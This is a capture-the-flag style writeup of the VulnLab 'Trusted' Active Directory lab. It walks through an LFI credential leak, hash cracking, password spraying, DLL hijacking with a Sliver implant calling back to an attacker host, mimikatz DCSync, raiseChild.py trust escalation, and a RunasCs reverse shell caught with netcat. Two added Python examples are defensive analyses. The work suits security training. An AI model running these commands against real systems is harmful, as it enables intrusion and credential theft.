Vulnlab - Trusted Writeup

Liam Geyer

👾 Chain Overview

This is a writeup of the chain Trusted from VulnLab. This chain was a lot of fun and dealt with some common web attacks, DLL hijacking, and AD trust exploitation.

๐Ÿ” Enumeration

I started off with an Nmap scan of the box:

nmap -sV -sC -Pn 10.10.168.5-6
Nmap scan report for 10.10.168.5
Host is up (0.100s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-22 20:09:34Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-22T20:10:03+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=trusteddc.trusted.vl
| Not valid before: 2024-09-21T20:04:55
|_Not valid after: 2025-03-23T20:04:55
| rdp-ntlm-info:
| Target_Name: TRUSTED
| NetBIOS_Domain_Name: TRUSTED
| NetBIOS_Computer_Name: TRUSTEDDC
| DNS_Domain_Name: trusted.vl
| DNS_Computer_Name: trusteddc.trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-09-22T20:09:45+00:00
Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-09-22T20:09:46
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Nmap scan report for 10.10.168.6
Host is up (0.099s latency).
Not shown: 985 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| http-title: Welcome to XAMPP
|_Requested resource was http://10.10.168.6/dashboard/
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-22 20:09:33Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| http-title: Welcome to XAMPP
|_Requested resource was https://10.10.168.6/dashboard/
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
| tls-alpn:
|_ http/1.1
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 11
| Capabilities flags: 63486
| Some Capabilities: Speaks41ProtocolOld, SupportsCompression, ConnectWithDatabase, Support41Auth, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, IgnoreSigpipes, SupportsLoadDataLocal, Speaks41ProtocolNew, SupportsTransactions, ODBCClient, FoundRows, InteractiveClient, LongColumnFlag, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: KGb::Qh:'SMhBSW=j~Z*
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=labdc.lab.trusted.vl
| Not valid before: 2024-09-21T20:04:57
|_Not valid after: 2025-03-23T20:04:57
| rdp-ntlm-info:
| Target_Name: LAB
| NetBIOS_Domain_Name: LAB
| NetBIOS_Computer_Name: LABDC
| DNS_Domain_Name: lab.trusted.vl
| DNS_Computer_Name: labdc.lab.trusted.vl
| DNS_Tree_Name: trusted.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-09-22T20:09:48+00:00
|_ssl-date: 2024-09-22T20:10:03+00:00; -1s from scanner time.
Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-09-22T20:09:54
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 119.55 seconds

I went ahead and added the following hosts to my /etc/hosts file:

trusted.vl
labdc.lab.trusted.vl
trusteddc.trusted.vl

I started by checking out SMB - I wasn't able to get anonymous or guest access to any shares, and SMBv1 is disabled.

🥼 LabDC

๐Ÿ‘จโ€โš– Web - Manes Winchester Family Law

Since SMB wasn't fruitful I pivoted to web on the LabDC.

XAMPP Page

The site proudly exclaims that it's running XAMPP for Windows 8.1.6, and is using PHP.

Dirbing the site with gobuster I found a couple of interesting endpoints.

gobuster dir -w ~/GitHub/SecLists/Discovery/Web-Content/big.txt -u https://10.10.168.6 -k
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: https://10.10.168.6
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /home/lfgberg/GitHub/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 301]
/.htpasswd (Status: 403) [Size: 301]
/aux (Status: 403) [Size: 301]
/cgi-bin/ (Status: 403) [Size: 301]
/com3 (Status: 403) [Size: 301]
/com2 (Status: 403) [Size: 301]
/com4 (Status: 403) [Size: 301]
/com1 (Status: 403) [Size: 301]
/con (Status: 403) [Size: 301]
/dashboard (Status: 301) [Size: 340] [--> https://10.10.168.6/dashboard/]
/dev (Status: 301) [Size: 334] [--> https://10.10.168.6/dev/]
/examples (Status: 503) [Size: 401]
/favicon.ico (Status: 200) [Size: 30894]
/img (Status: 301) [Size: 334] [--> https://10.10.168.6/img/]
/licenses (Status: 403) [Size: 420]
/lpt1 (Status: 403) [Size: 301]
/lpt2 (Status: 403) [Size: 301]
/nul (Status: 403) [Size: 301]
/phpmyadmin (Status: 403) [Size: 301]
/prn (Status: 403) [Size: 301]
/server-status (Status: 403) [Size: 420]
/server-info (Status: 403) [Size: 420]
/webalizer (Status: 403) [Size: 301]
/xampp (Status: 301) [Size: 336] [--> https://10.10.168.6/xampp/]
Progress: 20476 / 20477 (100.00%)
===============================================================
Finished
===============================================================

I started by checking out /dev.

Manchester Family Law

At the bottom we can see a Latest News section with an interesting note for Eric.

Latest News

Looks like there's going to be a database connection string or credentials that we can grab somehow. I forcefully browsed to /db.php (which could also have been found by fuzzing with the .php extension) and we see the string Connected Successfully.

Connected!

This isn't super helpful on its own - we need a way to grab the source of this page to see if we can find the database connection string or credentials. We can probably use PHP filters to Base64-encode the content, but we need somewhere to use them, most likely via an LFI.

Checking out the URL as we browse to different parts of the site, there's an interesting view parameter: https://10.10.168.6/dev/index.html?view=X.

We can toss a PHP filter in here to Base64-encode the content of db.php, allowing us to grab the full source of the file: https://10.10.168.6/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php.

<?php
$servername = "localhost";
$username = "root";
$password = "[REDACTED]";

$conn = mysqli_connect($servername, $username, $password);

if (!$conn) {
    die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>

Yippee! Some cleartext credentials.

🗃 MySQL

I went ahead and used those credentials to connect to MySQL on the Lab DC.

# Prompts for password
mysql -h [IP] -u root -p

To start I listed out the databases.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| news |
| performance_schema |
| phpmyadmin |
| test |
+--------------------+
6 rows in set (0.11 sec)

News looks cool - let's list its tables.

mysql> use news
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+----------------+
| Tables_in_news |
+----------------+
| users |
+----------------+
1 row in set (0.12 sec)

Users is also generally pretty cool - let's dump the content and look for creds.

mysql> select * from users;
+----+------------+--------------+-----------+----------------------------------+
| id | first_name | short_handle | last_name | password |
+----+------------+--------------+-----------+----------------------------------+
| 1 | Robert | rsmith | Smith | [REDACTED_HASH] |
| 2 | Eric | ewalters | Walters | [REDACTED_HASH] |
| 3 | Christine | cpowers | Powers | [REDACTED_HASH] |
+----+------------+--------------+-----------+----------------------------------+
3 rows in set (0.12 sec)

Who'd have guessed - hashed credentials! These are unsalted MD5, so I tried to give them a crack with hashcat.

hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt

I was able to get one of them to crack, so I made a userlist from the short_handle column, and sprayed against SMB.

nxc smb [LAB DC IP] -p pass.list -u user.list
SMB 10.10.168.6 445 LABDC [*] Windows Server 2022 Build 20348 x64 (name:LABDC) (domain:lab.trusted.vl) (signing:True) (SMBv1:False)
SMB 10.10.168.6 445 LABDC [-] lab.trusted.vl\Administrator:[REDACTED] STATUS_LOGON_FAILURE
SMB 10.10.168.6 445 LABDC [+] lab.trusted.vl\rsmith:[REDACTED]

Sure enough that popped for rsmith!

๐Ÿ‘ทโ€โ™‚ Robert Smith

Now as Robert - we canโ€™t WinRM - so I tried using bloodhound-python to enumerate AD.

No go. DNS issues. I was able to get around them using dnschef, a DNS proxy that can be useful for troubleshooting AD related DNS struggles.

We can use dnschef to proxy our DNS traffic to the Lab DC and make Bloodhound happy.

# in one window
python3 dnschef.py --fakeip [LAB DC IP]

# in another window
bloodhound-python -d 'lab.trusted.vl' -ns 127.0.0.1 -u 'rsmith' -p 'IHateEric2' -c all -dc labdc.LAB.TRUSTED.VL --zip

It looks like rsmith has ForceChangePassword over ewalters, so we can change that user's password.

BH ForceChangePass

One way to do this is over RPC with Samba's net rpc.

net rpc password "ewalters" "Password123" -U "lab.trusted.vl"/"rsmith"%"[REDACTED]" -S "[LAB DC IP]"

๐Ÿˆโ€โฌ› Eric Walters

Now as ewalters - we can WinRM in with our newly changed password.

*Evil-WinRM* PS C:\Users\ewalters\Desktop> type User.txt
|\---/|
| o_o |
\_^_/
These are not the flags you're looking for.
Take :robitcat: as compensation :).

Evil. Only time I've ever been trolled by VL. I'm in tears.

I've been had. I popped two Sliver beacons as ewalters and moved on. I found an interesting file in C:\AVTest:

*Evil-WinRM* PS C:\AVTest> cat readme.txt
Since none of the AV Tools we tried here in the lab satisfied our needs it's time to clean them up.
I asked Christine to run them a few times, just to be sure.

Let's just hope we don't have to set this lab up again because of this.

In AVTest there's a binary, C:\AVTest\KasperskyRemovalTool.exe. I'm thinking this could be a DLL hijacking scenario, so I exfiltrated the binary to a Windows machine and ran procmon.

Using Process Monitor we can filter for DLLs that are searched for and not found - we can then place a malicious DLL where Kaspersky is looking for it, and it will be run in the context of whatever user runs Kaspersky.

The program attempts to load KasperskyRemovalToolENU.dll - but it can't be found. I generated a malicious DLL with Sliver and threw it on disk.

generate --os windows --format shared --mtls [ATTACKER IP]:8443 --arch x86
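The following Python script is an added example, not code from the original writeup or the lab. It does the Process Monitor filtering described above offline: it parses a Procmon CSV export and lists, for one process, every DLL that was looked for and never found, in the order the directories were probed. The export rows are constructed to mirror what the KasperskyRemovalTool.exe capture looked like; they are not the real capture.

```python
import csv
import io

# Constructed sample of a Process Monitor CSV export (File > Save... > CSV),
# NOT real output captured on the box. Procmon's default export columns are used.
SAMPLE_PROCMON_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"8:01:10.1","KasperskyRemovalTool.exe","4120","CreateFile","C:\\AVTest\\KasperskyRemovalToolENU.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"8:01:10.2","KasperskyRemovalTool.exe","4120","CreateFile","C:\\Windows\\System32\\KasperskyRemovalToolENU.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"8:01:10.3","KasperskyRemovalTool.exe","4120","CreateFile","C:\\Windows\\System32\\KERNEL32.dll","SUCCESS","Desired Access: Read Attributes"
"8:01:10.4","KasperskyRemovalTool.exe","4120","CreateFile","C:\\AVTest\\settings.ini","NAME NOT FOUND","Desired Access: Generic Read"
"8:01:11.0","explorer.exe","1234","CreateFile","C:\\Users\\cpowers\\missing.dll","NAME NOT FOUND","Desired Access: Generic Read"
"""


def missing_dll_probes(csv_text, process_name):
    """Map each DLL the process asked for but never found to the directories it
    was probed in, in search order.

    Only CreateFile operations on *.dll paths with result NAME NOT FOUND count;
    successful loads and non-DLL lookups are ignored. The first directory in each
    list is where a planted DLL would be picked up, so it is the location whose
    ACL a defender should review (unprivileged users must not be able to write there).
    """
    probes = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Process Name"].lower() != process_name.lower():
            continue
        if row["Operation"] != "CreateFile" or row["Result"] != "NAME NOT FOUND":
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll"):
            continue
        dll_name = path.rsplit("\\", 1)[-1].lower()
        probes.setdefault(dll_name, []).append(path)
    return probes


if __name__ == "__main__":
    for dll, paths in missing_dll_probes(SAMPLE_PROCMON_CSV, "KasperskyRemovalTool.exe").items():
        print(f"{dll}: first probed at {paths[0]} ({len(paths)} locations searched)")
```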

There's another user running Kaspersky on a schedule - and if we wait we'll get a new callback as cpowers.

Sliver Callbacks

🕴 Christine Powers - DA Extraordinaire

Christine is a Domain Admin - that's pretty cool. And just as you'd think from the name of the machine - we have a trust to exploit.

Trust BH

There's a Parent-Child trust between lab.trusted.vl and trusted.vl. This means that because we've compromised the lab domain, we can become an admin on the parent domain as well.

Since we don't actually have any credentials for Christine, I used mimikatz to dump her NTLM hash.

.\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:cpowers"

Now we can exploit this trust by hand OR we can use Impacket's handy dandy raiseChild.py, which is made for exactly this scenario. All we have to do is supply credentials for a DA in a child domain and it will DCSync the parent.

raiseChild.py "lab.trusted.vl"/"cpowers" -hashes ":[REDACTED]"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Raising child domain lab.trusted.vl
[*] Forest FQDN is: trusted.vl
[*] Raising lab.trusted.vl to trusted.vl
[*] trusted.vl Enterprise Admin SID is: S-1-5-21-3576695518-347000760-3731839591-519
[*] Getting credentials for lab.trusted.vl
[SNIPPED]

Under the hood this uses the SID History attack: with the child's krbtgt hash it forges a TGT whose SIDHistory carries the parent's Enterprise Admins SID (the one ending in -519 above), which a parent-child trust does not filter, and then DCSyncs the parent automatically.
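To make the SID History step concrete, here is an added Python model (my own example, not raiseChild.py's code) of how the trusting domain treats the extra SIDs in a ticket that crosses a trust, with and without SID filtering, and what a defender should alert on. The Enterprise Admins SID is the one raiseChild.py printed above; the lab.trusted.vl domain SID is not in the writeup, so a placeholder is used.

```python
import re

# Domain-relative SID: S-1-5-21-<three sub-authorities>-<RID>
_DOMAIN_SID_RE = re.compile(r"^S-1-5-21(?:-\d+){3}-(\d+)$")

# Forest-root Enterprise Admins SID as printed by raiseChild.py above (RID 519).
ROOT_EA_SID = "S-1-5-21-3576695518-347000760-3731839591-519"
# The lab.trusted.vl domain SID is not in the writeup; this is a constructed placeholder.
CHILD_DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
ENTERPRISE_ADMINS_RID = 519


def split_sid(sid):
    """Split S-1-5-21-A-B-C-RID into ("S-1-5-21-A-B-C", RID)."""
    m = _DOMAIN_SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a domain-relative SID: {sid}")
    return sid[: sid.rfind("-")], int(m.group(1))


def apply_sid_filtering(issuing_domain_sid, extra_sids, quarantined):
    """Simplified model of what the trusting domain does with the ExtraSids
    (SIDHistory) in a ticket arriving over a trust. Returns (kept, dropped).

    quarantined=True : SID filtering on; any SID whose domain part is not the
                       issuing (trusted) domain is stripped.
    quarantined=False: the default for an intra-forest parent-child trust; the
                       SIDs are honoured, which is why a forged child TGT carrying
                       the root's Enterprise Admins SID works.
    Real filtering has further rules (well-known SIDs, forest trusts) not modelled here.
    """
    kept, dropped = [], []
    for sid in extra_sids:
        domain, _rid = split_sid(sid)
        if quarantined and domain != issuing_domain_sid:
            dropped.append(sid)
        else:
            kept.append(sid)
    return kept, dropped


def grants_forest_admin(kept_sids, root_domain_sid):
    """True if any honoured SID is the forest root's Enterprise Admins group: the
    condition to alert on when it shows up in tickets issued by a child domain."""
    return any(split_sid(s) == (root_domain_sid, ENTERPRISE_ADMINS_RID) for s in kept_sids)
```

Enabling quarantine on the trust (netdom trust ... /quarantine:yes) is the setting this models, but it is not a default for parent-child trusts and can break cross-domain access, so monitoring for the root's -519 SID in child-issued tickets is the practical control.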

🔒 EFS - One Final Troll

Now we can WinRM to the main DC as DA - but we're not actually able to read the final flag.

EFS, the Windows Encrypting File System, is preventing us from viewing the flag: the file's EFS key is protected by the owner's DPAPI master key, which is only unlocked in a logon made with the account's password. We can get around this by resetting the Administrator password and using RunasCs to start a new shell under a fresh logon with that password.

# On target
net user administrator Password123
.\runascs.exe administrator 'Password123' cmd.exe -r 10.8.0.230:6969
# On attacker
nc -lvnp 6969
Listening on 0.0.0.0 6969
Connection received on 10.10.211.69 55389
Microsoft Windows [Version 10.0.20348.887]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
VL{[SNIPPED]}
C:\Windows\system32>

Yippee!!

  • Title: Vulnlab - Trusted Writeup
  • Author: Liam Geyer
  • Created at: 2025-06-06 00:00:00
  • Updated at: 2025-06-16 22:36:27
  • Link: https://lfgberg.org/2025/06/06/vulnlab/trusted/
  • License: This work is licensed under CC BY-NC-SA 4.0.